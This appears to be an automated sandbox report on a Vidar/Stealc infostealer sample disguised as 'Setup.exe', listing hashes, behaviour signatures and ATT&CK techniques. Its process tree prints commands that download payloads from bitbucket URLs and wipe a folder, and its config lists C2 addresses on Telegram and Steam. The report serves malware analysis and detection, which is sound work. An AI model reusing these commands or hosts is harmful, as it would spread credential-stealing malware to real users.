Analysis

  • max time kernel
    124s
  • max time network
    295s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    30-06-2024 22:29

General

  • Target

    Setup.exe

  • Size

    2.0MB

  • MD5

    8fa393540a587e758138645fa689f390

  • SHA1

    0214c205e0c1fc792c94235d221bccf2b6af5057

  • SHA256

    452f779d72e74bbf249d92926e9b17cdcc2910bd214469f664947f797e4dc33f

  • SHA512

    874862e022f11e90d308c307ef806b5b0d7077ea1a058541b0b7c7821b0d12a5e45ee1e045c75ae915a41d343b1c08480830718aa2b9c7b905e2d063f22831f6

  • SSDEEP

    49152:KDjlabwz9wDjlabwz906mqnRYVd1AUyvKDGoEBs8Ya6:6qw2qwi6XnRYj1byCKoEBs8YZ

Malware Config

Extracted

Family

vidar

C2

https://t.me/g067n

https://steamcommunity.com/profiles/76561199707802586

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0

Signatures

  • Detect Vidar Stealer 5 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Executes dropped EXE 15 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3240
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1760
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\polaris.exe
        polaris.exe -priverdD
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2276
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gwadr.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gwadr.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Checks processor information in registry
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3220
          • C:\ProgramData\DGIJEG.exe
            C:\ProgramData\\DGIJEG.exe https://bitbucket.org/1234jhgv/jhygtfr/downloads/Update.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3376
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:1420
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:1068
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:592
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:4488
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:2172
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:2580
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:4784
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:4384
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:1908
            • C:\ProgramData\DGIJEG.exe
              C:\ProgramData\DGIJEG.exe
              6⤵
              • Executes dropped EXE
              PID:3676
          • C:\ProgramData\IDAEHC.exe
            C:\ProgramData\\IDAEHC.exe https://bitbucket.org/1234jhgv/jhygtfr/downloads/Update2.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4876
            • C:\ProgramData\IDAEHC.exe
              C:\ProgramData\IDAEHC.exe
              6⤵
              • Executes dropped EXE
              PID:1860
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AKEGHIJJEHJD" & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4528
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 10
              6⤵
              • Delays execution with timeout.exe
              PID:1616

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Subvert Trust Controls

1
T1553

Install Root Certificate

1
T1553.004

Modify Registry

1
T1112

Credential Access

Unsecured Credentials

3
T1552

Credentials In Files

3
T1552.001

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Collection

Data from Local System

3
T1005

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\DGIJEG.exe
    Filesize

    6KB

    MD5

    2890a00ef6943ed98e2b7c6e3e49ae1c

    SHA1

    9072a751e68fe39222aebc87ffb898a423310ce9

    SHA256

    0ab41930f0a18d7629031bf5cd9a8c7090c13983c1d7567b9018185f0fa18f0d

    SHA512

    dd01c349264e431f3ec900e05062fa4300a4f8a9219edf4f7f8014a92dadd4aae0f05cc4a103f30bdd4d9915460edb03769ffdff0c9e290acd4c89b3a16542fe

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_B5D3A17E5BEDD2EDA793611A0A74E1E8
    Filesize

    1KB

    MD5

    bb91a2296fa5c365dbaf92701f51e32b

    SHA1

    f32e5b3c95b4a0d011c2d5178b3912d75d3a0bbd

    SHA256

    9605a9fae4ebec7e2860da25de61f03b2b5e44cc37f5e1febd937e704e15f82a

    SHA512

    6305896a3d56d03a2a9a43b0699ec81f5b2ed86870e52430a456c99e971bf8733ed49b9263bc47837aa7a9de61b05856958e0faca692aa65a8e6834c29f02e00

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62
    Filesize

    2KB

    MD5

    2acc1200c07c67cc36319fb9f3c9e5b7

    SHA1

    7703ad06a3af84afc8cdca28379ea9ae914ccff4

    SHA256

    03a9dcb6301824d4d069b5901ddd0e8aa3a49931a15c7850bdf5e06de870d37c

    SHA512

    e277995d414637192a7d83dec6a65e681262364ff806439f3b3f91589b88d9ae13dc281a5e3f573f62609b9b141da0b6e317460a856e9a16f4d318185991c1c0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894
    Filesize

    1KB

    MD5

    0b7c461d24660ef3fea5968fe062e81d

    SHA1

    2717adc388ef3d844f979d5c1e881565044cc1d5

    SHA256

    47e886f6aee0d961bfbe1fef93133f9de4cbc6eceadb7c556196d0e9d6d46597

    SHA512

    32d8558fe5ea36fcc3d20a1f1fd5a29de7bab490c98dc89509137e7d4d7aa240ecfdd9656bc48df8cc8588c3ae807b8600d7fd75625c13a7222742ec84c16bc6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D03E46CD585BBE111C712E6577BC5F07_56B2A1FF8D0F5C5B4060FCF88A1654FE
    Filesize

    471B

    MD5

    ddc1e2d54cdb15a31cd3a97e640877c0

    SHA1

    5a297a7d987f7a4c82852f7f27d856782bcd7631

    SHA256

    383dc8f70420a810f06890246bbe389cab1ad48ae3e7952d5992a73615e0a354

    SHA512

    850853828974a5d54ab5fcfe0330e470439c03bdeea9dd090131fae7c82ddb4e245a1ca1621e1e61a3aef3a976c45be069b7827b8f66387273498d19cf5a0ae9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_B5D3A17E5BEDD2EDA793611A0A74E1E8
    Filesize

    438B

    MD5

    fa1823852d6344adb36a1b2d6f7f5996

    SHA1

    c7719fd089c7e011d09c7abcefd977bdf0bb0157

    SHA256

    7ffeb67ad031d246a58c3b9f53ec8bfba061b543f8987651db78aead301a10d0

    SHA512

    3d8ed020e838690a92147ba5a0219a5cd9c6beb9205ee0e1c1e3baae519ba48f677c931aa0ec1ec4c8fb725e140940314a559b737012f17269450699d4891b36

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62
    Filesize

    458B

    MD5

    ecaeaf045a1360ed8331a1a0f75606a2

    SHA1

    77eb3ff4cc413d39cf41a4b42c5b3d8f3163bd05

    SHA256

    06947cda847084e2779fef1efb0fbd06edf38dcb4c10195c6429da3b7e36eb66

    SHA512

    bb29ec4ba99b7efc85db828162f5209d85656254a49ed2656a7bfb1ed1c8bf45b32e14c756db411e9df46f6c15f4f6193266ef6a093c104cff5c589f38136160

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894
    Filesize

    432B

    MD5

    2e8bf5c8cd8b6ded7249b8ef87a02e13

    SHA1

    2ec9c29f970daa0fc6008a991ace8b3449dc1fd4

    SHA256

    1587afc032c24941fb4eed5b08a8cc6a6706e4f6f288619706f693265b414f00

    SHA512

    3628bee03fa0c86c5d70042ad4a05865cbced0f75f8eb517fb7024b02a7215d199d76552c062b1cb01589d689426df6743a71864abcb0de70665b187ea4c7ad2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D03E46CD585BBE111C712E6577BC5F07_56B2A1FF8D0F5C5B4060FCF88A1654FE
    Filesize

    418B

    MD5

    ef3caf763a200db6b74e452afd120154

    SHA1

    c5664478519b858eb6641b7b1212ee450b1b442d

    SHA256

    116733dba023238fb8165d6cec33dbf14a452d604e65eb98d8cdef3bb9cc1da5

    SHA512

    6ece3b69377bc190ee6d5e600d4079f2dc3aa39dd256c22b34c343a409c44db70d02b8b15b563dd360a9b059ca10a20e45a5afc13f23ff81f4b947b72debc47d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\V28C7N3J\Update[1].exe
    Filesize

    6.1MB

    MD5

    6044436058d895c5f11bd69742675411

    SHA1

    d55350aa01ca32a5d5f015d892eeae3edc81189c

    SHA256

    564570e26c2e8682c181ffbba655590a5cce262ffa6ab73467dff64e9a65904c

    SHA512

    a88d7f47aa96209aacfb3ef1d9421ffb3542b44e49cf89f0c63ec1c311039f756a2e4df4ddbe3678995d07600de7eaff8219a9b07d02433a89bfc9a302d941c5

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\WFQ509M6\Update2[1].exe
    Filesize

    9.3MB

    MD5

    edec5f883254bec6db616127da25a36f

    SHA1

    e44b5dcfd74488cc425d0e53fcb261456c5f7f6c

    SHA256

    481f04bdcd93d99da4a9b470254d34f1fcd40bde2ea4785f39bc57744e57f925

    SHA512

    23adb5ebd55a25683aadfa72bb679435f0c765e028e0e2cee2aa028cdec4b6efc47042d917d96c0555ac5d299e439537a0c1cde629557ff5d7fcf3b5c1c67828

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat
    Filesize

    38B

    MD5

    76ce3d5d5c3032cc9f78133af90b7ca7

    SHA1

    774907a1177135daf81ad950c2201510958cc52b

    SHA256

    7deb532bdc37e4ed59642407a94a479ad7b7c18b852c9237899bb1fa9e55febd

    SHA512

    fbc4c6fe065ed0000687130f6a173349ccd3fb68a6b5fa72c24cac90cbb53b82970961b60bee7bc1318682de70823aa054eff27010773b3c5b950ed084ba71de

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\polaris.exe
    Filesize

    1.6MB

    MD5

    3ee1804bc494d1b0102d5d0f804c9702

    SHA1

    9e809296552edd8630d79687903c433d970c2cc1

    SHA256

    125f986dcb7b9e1c5d2a78945615c879f88e79068b9a17e0921ddfff845ee867

    SHA512

    bdef8aa1e413bae5a3aef73452332e502f6112cb368f613f36e742e3f53962f1bcfa5561df89aadde080c1a26de2d14819e7019b7f872c07ecc0aa073187f3e8

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gwadr.exe
    Filesize

    1.1MB

    MD5

    7ecf51664c9a0533ff46605c65b189e2

    SHA1

    b5a4ce3a27b406a16d6dd3068a7a4a32a9c162e3

    SHA256

    4668ef4d299bdbff5be6072ba0761db1e6b72a96e614b9ffe52262a1175842be

    SHA512

    88622a731e5298fc58bb9b786be5344cda4f92d9de66d25a219f8e796fc77cf285df7c93d4a8d1ded5ce8adf924bae90a72a83d54ee59def75c4b8895af8d9d2

  • memory/1860-118-0x0000000140000000-0x00000001411B0000-memory.dmp
    Filesize

    17.7MB

  • memory/1860-116-0x0000000140000000-0x00000001411B0000-memory.dmp
    Filesize

    17.7MB

  • memory/3220-20-0x0000000000850000-0x0000000000DFD000-memory.dmp
    Filesize

    5.7MB

  • memory/3220-108-0x0000000000850000-0x0000000000DFD000-memory.dmp
    Filesize

    5.7MB

  • memory/3220-109-0x0000000000850000-0x0000000000DFD000-memory.dmp
    Filesize

    5.7MB

  • memory/3220-57-0x0000000000850000-0x0000000000DFD000-memory.dmp
    Filesize

    5.7MB

  • memory/3220-36-0x0000000034EF0000-0x000000003514F000-memory.dmp
    Filesize

    2.4MB

  • memory/3220-77-0x0000000000850000-0x0000000000DFD000-memory.dmp
    Filesize

    5.7MB

  • memory/3220-120-0x0000000000850000-0x0000000000DFD000-memory.dmp
    Filesize

    5.7MB